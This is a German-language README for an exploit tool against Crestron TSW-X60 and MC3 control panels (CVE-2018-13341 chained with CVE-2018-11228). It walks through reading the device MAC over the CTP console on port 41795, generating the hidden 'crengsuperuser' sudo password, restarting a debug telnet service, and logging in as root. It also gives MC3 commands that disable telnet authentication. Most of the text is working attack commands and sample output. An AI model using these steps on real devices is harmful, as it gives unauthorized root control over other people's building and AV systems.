
Werkzeug zum Ausnutzen von CVE-2018-13341 und Wiederherstellen des versteckten Kontopassworts auf Crestron-Geräten
Basierend auf der Entdeckung von Ricky Lawshae an Crestron TSW-X60 und MC3 Geräten, zielt dieses Tool darauf ab, die CVE-2018-13341 auszunutzen. Mit der MAC-Adresse des Zielgeräts können Sie das Passwort des versteckten Kontos "crengsuperuser" wiederherstellen, das erhöhte Privilegien besitzt und Ihnen erlaubt, SUDO-Befehle auszuführen.
Auf Crestron TSW-X60 < 2.001.0037.001 und MC3 < 1.502.0047.00 können die Passwörter für spezielle Sudo-Konten mithilfe von Informationen berechnet werden, die für Benutzer mit normalen Rechten zugänglich sind. Angreifer könnten diese Passwörter entschlüsseln, was es ihnen ermöglichen könnte, versteckte API-Aufrufe auszuführen und die Sandbox-Umgebung der CTP-Konsole mit erhöhten Privilegien zu verlassen.
Das Crestron Toolbox Protocol (CTP) kann durch Zugriff auf Port 41795 des TSW-XX60 Geräts verbunden werden. Dann können Sie den Befehl estat verwenden, um die MAC-Adresse des Geräts zu erhalten:
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
Dieses Tool erfordert das Modul cryptography.
$ pip3 install cryptography
ODER
$ pip3 install -r requirements.txt
usage: crestron_getsudopwd.py [-h] [-m MAC]
Tool zum Generieren von Passwörtern versteckter Crestron-Konten
optionale Argumente:
-h, --help diese Hilfemeldung anzeigen und beenden
-m MAC, --mac MAC MAC-Adresse des Ziels (ohne Doppelpunkte oder Punkte)
# Beispiel
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t
CVE-2018-11228 ermöglicht eine nicht authentifizierte RCE über den Bash-Shell-Dienst im Crestron Terminal Protocol (CTP). Nachdem Sie das Passwort des versteckten Kontos "crengsuperuser" erhalten haben, können Sie Root-Zugriff auf die zugrunde liegende Linux-Box erhalten.
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
Dann können Sie in einer neuen Shell Root-Zugriff auf die Box erhalten.
$ telnet w.x.y.z
bash-3.2# whoami
root
Hinweis : Dieses Beispiel gilt für TSW-Geräte. Der Vorgang unterscheidet sich geringfügig für MC3-Geräte. Sie müssen die folgenden Befehle verwenden, um die Shell zu aktivieren:
SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0dann,SUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:
Hier sind einige interessante Ressourcen zu dieser Schwachstelle :